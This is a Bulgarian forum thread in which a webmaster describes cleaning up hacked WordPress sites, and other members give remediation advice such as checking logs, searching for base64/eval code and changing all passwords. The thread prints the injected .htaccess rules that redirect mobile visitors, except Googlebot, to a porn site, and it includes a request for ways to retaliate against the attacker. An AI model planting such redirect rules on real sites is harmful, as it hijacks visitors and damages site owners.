HELP! Спря трафик, пари ... какво се случва???
- Автор webmast367
- Начална дата
webmast367
Well-Known Member
Открих в .htaccess
в кода има - RewriteRule ^(.*)$ http://0-mi.com [L,R=302]
това ми отваря
същия порно сайт
RewriteEngine On
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "android|BlackBerry|htc|iPad|iPhone|iPod|kindle|lg|midp|mmp|mobile|mot|nokia|o2|opera mini|J2ME" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pocket|psp|sgh|smartphone|sonyericsson|symbian|treo mini|up.browser|up.link|vodafone|wap" [NC]
RewriteCond %{HTTP_USER_AGENT} !Googlebot-Mobile [NC]
RewriteRule ^(.*)$ http://0-mi.com [L,R=302]
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Промених тоя линк с линка на сайта ми, но явно не е само там редиректа
webmast367
Well-Known Member
Добре най-накрая оправих единия сайт МАЙ!
Само това трябва да е в .htaccess
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Само това трябва да е в .htaccess
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
webmast367
Well-Known Member
Току що отстраних проблема с редиректа на мобилния трафик. Сега сканирам отново за вируси и т.н, и правя бекъп! Би трябвало да е окей вече...
Отне ми 3 дни, защото грам не съм наясно с тия вируси и докато прочета 500 теми за атаки, да пиша на 10 познати да помагат и прочие .. и така!
Еми така се прави, трябва да имаш проблем, та мъчейки се покрай него, да нямаш подобни в бъдеще. Това вервай ми ще ти помага много в бъдеще 
Иначе можеше да е по-лесно ако в началото просто беше проверил логовете. Също така проверяваш от датата на проблема за нови и променени такива файлове. После общо взето не е тайна за никого, че се търси функция, скрипт, код, инжекция, турбо дизел и тн от най-известните марки, като base64, eval, replace, substr, inflete и тн подобни резачки.
После смени и всички, абсолютно всички пароли ( и на акаунта цпанел) с други. Смени и имената на базите дори, смени и името на всички юзери и също адреса за логин, капчи казах вече.
За врътпреса има хужави секюрити плъгини за целта, трябва да ги разчекнеш малко повече.
Иначе можеше да е по-лесно ако в началото просто беше проверил логовете. Също така проверяваш от датата на проблема за нови и променени такива файлове. После общо взето не е тайна за никого, че се търси функция, скрипт, код, инжекция, турбо дизел и тн от най-известните марки, като base64, eval, replace, substr, inflete и тн подобни резачки.
После смени и всички, абсолютно всички пароли ( и на акаунта цпанел) с други. Смени и имената на базите дори, смени и името на всички юзери и също адреса за логин, капчи казах вече.
За врътпреса има хужави секюрити плъгини за целта, трябва да ги разчекнеш малко повече.
webmast367
Well-Known Member
Еми така се прави, трябва да имаш проблем, та мъчейки се покрай него, да нямаш подобни в бъдеще. Това вервай ми ще ти помага много в бъдеще
Иначе можеше да е по-лесно ако в началото просто беше проверил логовете. Също така проверяваш от датата на проблема за нови и променени такива файлове. После общо взето не е тайна за никого, че се търси функция, скрипт, код, инжекция, турбо дизел и тн от най-известните марки, като base64, eval, replace, substr, inflete и тн подобни резачки.
После смени и всички, абсолютно всички пароли ( и на акаунта цпанел) с други. Смени и имената на базите дори, смени и името на всички юзери и също адреса за логин, капчи казах вече.
За врътпреса има хужави секюрити плъгини за целта, трябва да ги разчекнеш малко повече.
О да, вече със сигурност ще знам за вбъдеще доста неща.....
За сега трафика е добре, надявам се да съм оправил всички проблеми. ЗА смяна на пароли, админ логини (линкове) и т.н тепърва ще се хвана да променя и опресня всичко.
Сега имам друг малко по-различен въпрос.
КАК ХАДЖЕБА да му е*а майката на тоя гнусар....
http://reversewhois.domaintools.com/?email=fc113d2a74460f9bcae08fbf0ca30e54
Според - domaintools.com/
Ип
Имейл на регистрация, къде хоства и т.н, но как може да ми послужи това...
Ако пиша на хостинга му надали ще ме отразят с предприемане на мерки...
Какво мога да направя по въпроса, та поне малко да си му върна 4те безсънни нощи...
webmast367
Well-Known Member
Ако беше някой в БГ щях да го търся, ама в Австралия да ходя... непосилно ми е...
webmast367
Well-Known Member
Това не са вируси
Wordfence засече МНОГО вируси, както и променени файлове в Wordpress.
Като свалих на компа бекъп да търся проблемите по-лесно само единия сайт ми засече 50+ троянеца (засечени от Malarybytes) Нод32 спи.... тъй като на уиндоуса е инсталнат той.
Всички сайтове до един бяха претъпкани с вируси, не просто кодове. Не разбирам и няма да споря, но имаше зараза в абсолютно всички файлове .php, както и плъгини, като supercashe, seo и т.н сега показва, че е чисто... ще следя 2-3 дни през 10 мин, дано не се върне отново нещо..
Горе hristonev ти каза - голяма е разликата. Който и да е антивирус, при ебан код, само ще гледа умно. Трябва да провериш всичките си файлове, няма как. Сложи и като за начало 444 на htaccess файла.
Ако не смениш ВСИЧКИ пароли, рискуваш тоя труд в момента да не е особено полезен.
Ако не смениш ВСИЧКИ пароли, рискуваш тоя труд в момента да не е особено полезен.
webmast367
Well-Known Member
Заемам се със смяната на пароли и т.н.
Благодаря на всички, които се отзоваха. Дано не се налага на някой друг да попада в същото положение.
Поздрави!
hristonev
Well-Known Member
Значи как бих подходил аз към нещата.
1. Преименувам индексния файл.
2. Създавам индекс.хтмл и пиша дъра-бъра имаме техн. проблеми.
3. Ако не си виждам текста от горния файл - пипам хтаксеса.
4. Свалям си всичко локално и го преглеждам/пускам на друг сървър.
5. Качвам и пускам сайта.
Ако сайта е счупен(редиректва към порно) за 3 дни както във Вашия случай, не знам дали гошо няма да реши да ви спре индекса или да Ви упомене в някоя черна листа.
Това го пиша по-скоро за други на които се случи.
1. Преименувам индексния файл.
2. Създавам индекс.хтмл и пиша дъра-бъра имаме техн. проблеми.
3. Ако не си виждам текста от горния файл - пипам хтаксеса.
4. Свалям си всичко локално и го преглеждам/пускам на друг сървър.
5. Качвам и пускам сайта.
Ако сайта е счупен(редиректва към порно) за 3 дни както във Вашия случай, не знам дали гошо няма да реши да ви спре индекса или да Ви упомене в някоя черна листа.
Това го пиша по-скоро за други на които се случи.
И аз само да измрънкам нещо за последно Понеже до сега си минавал само с антивируса и чека на уърдфенса, сега ще ти се наложи и да променяш/запазваш файлове. Най-вероятно си знаеш, но не прави никога това посредством обикновен редактор, какъвто например е уйндолския нотпад или обикновен тхт, защото могат да станат наистина страшно големи ла.на, които и 5 човека може да не могат да оправят. Променяй/запазвай файловете само със специални за целта, като най-лесният и удобен за теб ще е notepad++
Понеже до сега си минавал само с антивируса и чека на уърдфенса, сега ще ти се наложи и да променяш/запазваш файлове. Най-вероятно си знаеш, но не прави никога това посредством обикновен редактор, какъвто например е уйндолския нотпад или обикновен тхт, защото могат да станат наистина страшно големи ла.на, които и 5 човека може да не могат да оправят. Променяй/запазвай файловете само със специални за целта, като най-лесният и удобен за теб ще е notepad++
webmast367
Well-Known Member
И аз само да измрънкам нещо за последно
Мерси колега, но така или иначе винаги когато променям файловете ги свалям, и ги преглеждам с notepad++ освен в случаите, когато трябва да вкарам някой скрипт код, или рекламен елемент, тогава директно от редактора на темата го правя.